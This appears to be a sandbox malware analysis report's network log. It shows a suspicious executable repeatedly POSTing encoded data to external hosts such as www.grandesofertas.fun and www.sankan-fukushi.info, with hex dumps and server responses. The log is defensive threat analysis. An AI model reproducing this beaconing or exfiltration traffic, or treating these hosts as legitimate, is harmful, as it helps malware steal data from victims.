55 41 6a 4a 6b 39 33 73 6d 68 67 3d 3d 26 74 58 75 6c 3d 55 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#fff
                                                                                  Nov 13, 2024 15:36:49.327493906 CET538INData Raw: 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 70 33
                                                                                  Data Ascii: fff" text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/p31e/?2J=L+1a/BdGYszeAGcVS8K8+8pLLusK97ER9aBhPiMrG4kn6GD5PjBb9DoL0CFI31uDvMTM4NZQBreJcdqa1xIiIspx5ApjHldDKvBxAP0DMlqCnZV88rmUcHIUAjJk93smhg==&tXul=U2UloNhP&fp=-3'>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.55002376.223.74.74803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:54.477118969 CET718OUTPOST /cu92/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.grandesofertas.fun
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/cu92/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 6f 75 76 51 53 52 41 74 54 57 45 70 73 48 6c 55 38 69 71 59 32 48 44 78 7a 66 61 44 4d 47 58 49 71 6e 4b 4d 67 51 61 4b 46 53 42 36 52 6b 55 63 6d 76 68 57 79 35 63 50 31 68 43 47 70 44 67 4a 48 7a 39 63 56 65 32 70 56 34 6d 6a 31 79 2b 44 7a 73 38 41 42 2b 36 4d 30 6c 76 54 76 79 54 75 4a 44 4a 38 77 74 55 4b 75 70 38 53 6e 6d 6c 44 73 67 2b 36 54 45 31 41 4b 79 77 71 71 57 53 46 50 4a 4c 48 69 36 65 58 69 68 59 6a 32 4b 69 39 52 54 6c 30 58 6d 34 54 4e 39 4b 33 69 57 47 59 31 71 52 78 4c 4a 6e 47 49 57 50 47 31 49 50 4d 46 32 66 65 71 79 6f 35 43 55 53 4b 45 33 53 66 75 4e 69 4d 61 52 30 3d
                                                                                  Data Ascii: 2J=ouvQSRAtTWEpsHlU8iqY2HDxzfaDMGXIqnKMgQaKFSB6RkUcmvhWy5cP1hCGpDgJHz9cVe2pV4mj1y+Dzs8AB+6M0lvTvyTuJDJ8wtUKup8SnmlDsg+6TE1AKywqqWSFPJLHi6eXihYj2Ki9RTl0Xm4TN9K3iWGY1qRxLJnGIWPG1IPMF2feqyo5CUSKE3SfuNiMaR0=
                                                                                  Nov 13, 2024 15:36:55.119054079 CET456INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:36:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.55002476.223.74.74803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:57.022141933 CET738OUTPOST /cu92/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.grandesofertas.fun
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/cu92/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 6f 75 76 51 53 52 41 74 54 57 45 70 74 6e 31 55 77 68 43 59 36 33 44 77 39 2f 61 44 56 57 58 45 71 6e 47 4d 67 52 66 50 46 6e 5a 36 52 42 34 63 6e 75 68 57 2b 5a 63 50 2b 42 43 48 6d 6a 67 43 48 7a 41 6a 56 62 4f 70 56 38 4f 6a 31 32 36 44 7a 66 55 44 48 75 36 4b 68 31 76 52 79 69 54 75 4a 44 4a 38 77 74 77 73 75 70 45 53 6d 58 56 44 2b 56 53 31 65 6b 31 66 4c 79 77 71 75 57 54 4d 50 4a 4c 6c 69 37 53 78 69 6e 63 6a 32 4c 53 39 52 42 4e 37 64 6d 34 5a 51 74 4c 2b 71 30 7a 51 78 73 4a 63 48 61 36 59 51 6e 37 77 35 65 2b 6d 66 55 58 32 35 53 45 42 53 48 61 39 56 48 7a 32 30 75 79 38 45 47 69 48 77 4d 38 55 45 51 50 4b 54 63 43 47 62 51 78 6c 42 66 63 74
                                                                                  Data Ascii: 2J=ouvQSRAtTWEptn1UwhCY63Dw9/aDVWXEqnGMgRfPFnZ6RB4cnuhW+ZcP+BCHmjgCHzAjVbOpV8Oj126DzfUDHu6Kh1vRyiTuJDJ8wtwsupESmXVD+VS1ek1fLywquWTMPJLli7Sxincj2LS9RBN7dm4ZQtL+q0zQxsJcHa6YQn7w5e+mfUX25SEBSHa9VHz20uy8EGiHwM8UEQPKTcCGbQxlBfct
                                                                                  Nov 13, 2024 15:36:57.661840916 CET456INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:36:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.55002576.223.74.74803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:59.629200935 CET1755OUTPOST /cu92/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.grandesofertas.fun
                                                                                  Origin: http://www.grandesofertas.fun
                                                                                  Referer: http://www.grandesofertas.fun/cu92/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 6f 75 76 51 53 52 41 74 54 57 45 70 74 6e 31 55 77 68 43 59 36 33 44 77 39 2f 61 44 56 57 58 45 71 6e 47 4d 67 52 66 50 46 6e 52 36 52 54 77 63 6d 4e 35 57 2f 5a 63 50 39 42 43 4b 6d 6a 67 62 48 33 73 76 56 62 4c 55 56 36 4b 6a 30 54 75 44 6a 75 55 44 4f 75 36 4b 6a 31 76 51 76 79 54 65 4a 44 5a 34 77 74 41 73 75 70 45 53 6d 56 64 44 75 51 2b 31 4e 55 31 41 4b 79 77 32 71 57 54 67 50 4e 76 66 69 37 47 48 69 33 38 6a 33 72 43 39 58 30 52 37 56 6d 34 58 52 74 4c 6d 71 30 76 66 78 6f 68 6d 48 5a 6d 2b 51 67 58 77 36 34 61 34 41 6b 58 74 6f 41 6b 77 66 46 65 44 48 52 50 4c 37 4e 6d 62 45 6d 4f 2b 7a 38 30 45 54 67 76 39 66 50 6a 38 50 6e 56 44 44 71 5a 2b 78 77 38 55 54 38 6f 51 5a 45 62 59 67 46 77 66 53 37 6c 4c 4b 6d 4e 35 42 31 34 72 38 33 6f 43 73 72 43 6a 59 55 68 58 47 6f 68 4d 6e 54 6a 6c 42 4c 6d 57 4e 66 66 67 6f 30 33 53 64 76 34 59 5a 70 67 46 44 56 6e 68 5a 67 61 66 30 76 36 4d 47 69 4b 69 6e 43 69 59 70 4e 6e 49 7a 46 32 32 51 66 6c 63 7a 68 61 4c 51 7a 57 31 66 6e 6f 76 2f 48 6a [TRUNCATED]
                                                                                  Data Ascii: 2J=ouvQSRAtTWEptn1UwhCY63Dw9/aDVWXEqnGMgRfPFnR6RTwcmN5W/ZcP9BCKmjgbH3svVbLUV6Kj0TuDjuUDOu6Kj1vQvyTeJDZ4wtAsupESmVdDuQ+1NU1AKyw2qWTgPNvfi7GHi38j3rC9X0R7Vm4XRtLmq0vfxohmHZm+QgXw64a4AkXtoAkwfFeDHRPL7NmbEmO+z80ETgv9fPj8PnVDDqZ+xw8UT8oQZEbYgFwfS7lLKmN5B14r83oCsrCjYUhXGohMnTjlBLmWNffgo03Sdv4YZpgFDVnhZgaf0v6MGiKinCiYpNnIzF22QflczhaLQzW1fnov/HjG/V01pma22R6jg0EePY0ejoeOqVJlOnBvzCZzg13Hn4Z1n6lJ8bcnqNeoPYt6s+ip7t6OpcO9UZtH+AGHXBfmlGuS+8tWCxNmqA+1SE9MSBXyiMDb1bci9niDg2JjqB9ZVY90Gz0UtAD2qVeeBJHz1ap2G5kSwu9IQ2vBbZZV1yIFM7/IMvn1nIySlYIoUVO6qD/PflMp2zan9kSSyz6qpfvhZWvDQelO0RUEeLBV8HUntR3upCVwu8f/HuMxDdgiBWCF6yjqwx6T7su+yGAtrI2suLgisbSpB3M7Wk3ZjTcFgUOayLWPontrQOeTDgcwXIsXnTBmdh1QlA5lZt6D6EBEmP/sNqE0VyKvO+UvTauH/RyF1uFeNOUkk9J1JIqMxVYtj+FX4ZT66xCLIE+Mth8MsrYpq6xy4rOh5WSwGvhLEnSBKI+nHiOMIXc3/wuA5Xpd0SP1ob2D9PasyuIYilc3eJig1+HjOI8A0fzv2cQr5my3QrwACn0kVuF0IS2MaJVmAuZZyBP66VZCEgJ1Ul9SRoY8yrHVLyhg6HXOmN2WKhluCujM9SgqZCQ2UbQkenXsSaB09yC+CNbeYZ5LxblYEuUBZ5MAljGNux+y0UFV5ReJme0aroRy2kRNJ5aWdqzkhLDnY3WN2QLcU5qZyby9vlvIx+fJd [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:00.259753942 CET456INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:37:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.55002676.223.74.74803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:02.174792051 CET447OUTGET /cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbhDcZOCNwErTQXryorxHC4PkDe5WJpFvO4SjuRTQ+4P0+jcQZ5F9wjze3RXp2BxR3tkOJaw==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.grandesofertas.fun
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:37:02.845258951 CET606INHTTP/1.1 301 Moved Permanently
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:37:02 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 162
                                                                                  Connection: close
                                                                                  Location: https://www.grandesofertas.fun/cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGbhDcZOCNwErTQXryorxHC4PkDe5WJpFvO4SjuRTQ+4P0+jcQZ5F9wjze3RXp2BxR3tkOJaw==&tXul=U2UloNhP
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.550027163.44.185.183803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:37:08.955539942 CET721OUTPOST /p9qy/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/p9qy/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 68 78 6d 48 7a 72 38 2b 4b 65 6b 39 43 34 55 32 57 63 6e 55 76 5a 77 2f 34 48 47 6b 58 61 38 72 44 4e 58 59 43 45 77 4a 65 49 69 43 76 71 77 54 46 65 2f 2f 74 6a 6c 7a 57 69 50 35 66 46 31 41 46 33 59 45 43 38 66 45 39 37 36 50 78 44 73 70 79 64 44 62 34 77 46 37 4e 44 6c 4f 31 46 64 52 48 41 6a 62 45 47 71 63 45 79 4a 35 36 50 68 49 61 36 78 4b 6d 50 64 45 57 51 69 4a 67 47 4e 6b 33 6e 51 52 37 5a 67 77 58 74 69 43 4f 41 62 47 38 7a 37 41 48 51 68 34 6b 74 32 74 37 63 6b 69 63 65 68 6b 2f 36 35 65 66 30 6a 76 58 2b 4f 4d 63 6b 45 64 4a 4d 61 5a 44 6c 6e 2b 42 30 6c 68 69 33 67 6c 72 5a 49 3d
                                                                                  Data Ascii: 2J=hxmHzr8+Kek9C4U2WcnUvZw/4HGkXa8rDNXYCEwJeIiCvqwTFe//tjlzWiP5fF1AF3YEC8fE976PxDspydDb4wF7NDlO1FdRHAjbEGqcEyJ56PhIa6xKmPdEWQiJgGNk3nQR7ZgwXtiCOAbG8z7AHQh4kt2t7ckicehk/65ef0jvX+OMckEdJMaZDln+B0lhi3glrZI=
                                                                                  Nov 13, 2024 15:37:09.841588974 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:37:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 13, 2024 15:37:09.841615915 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                                                  Nov 13, 2024 15:37:09.841628075 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                                                  Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                                                  Nov 13, 2024 15:37:09.842107058 CET1236INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                                                  Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                                                  Nov 13, 2024 15:37:09.842122078 CET848INData Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                                                  Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
                                                                                  Nov 13, 2024 15:37:09.842582941 CET1236INData Raw: 2d 31 33 2e 35 34 35 2d 31 35 2e 32 38 39 2d 32 31 2e 33 35 36 2d 33 31 2e 37 37 34 2d 32 31 2e 34 33 31 2d 31 31 2e 32 35 33 20 30 2d 31 39 2e 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34
                                                                                  Data Ascii: -13.545-15.289-21.356-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.23
                                                                                  Nov 13, 2024 15:37:09.842595100 CET1236INData Raw: 35 33 33 2d 32 2e 35 33 34 2d 31 2e 33 34 31 2d 35 2e 30 30 32 2d 32 2e 34 30 39 2d 37 2e 33 36 2d 2e 33 30 34 2d 2e 36 37 2d 2e 39 38 36 2d 31 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33
                                                                                  Data Ascii: 533-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.65
                                                                                  Nov 13, 2024 15:37:09.842608929 CET1236INData Raw: 2e 35 35 35 20 31 39 2e 33 38 34 7a 6d 33 32 2e 39 32 32 2d 32 36 2e 34 34 33 63 2d 2e 30 31 31 20 32 2e 30 39 38 2d 2e 34 34 39 20 34 2e 31 37 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39
                                                                                  Data Ascii: .555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126
                                                                                  Nov 13, 2024 15:37:09.843436956 CET1236INData Raw: 20 31 2e 39 31 35 2d 2e 32 37 36 2e 36 34 35 2d 2e 39 30 31 20 31 2e 30 37 32 2d 31 2e 36 30 32 20 31 2e 30 39 35 6c 2d 2e 30 31 33 2e 30 36 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e
                                                                                  Data Ascii: 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.
                                                                                  Nov 13, 2024 15:37:09.843451023 CET1236INData Raw: 38 63 2d 2e 33 37 32 2d 2e 35 33 37 2d 2e 37 34 2d 31 2e 31 30 38 2d 31 2e 31 32 33 2d 31 2e 37 32 34 6c 2d 2e 34 34 32 2d 2e 37 33 36 2d 2e 32 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39 2d 32 2e 33 36 37 2d 32 2e 34
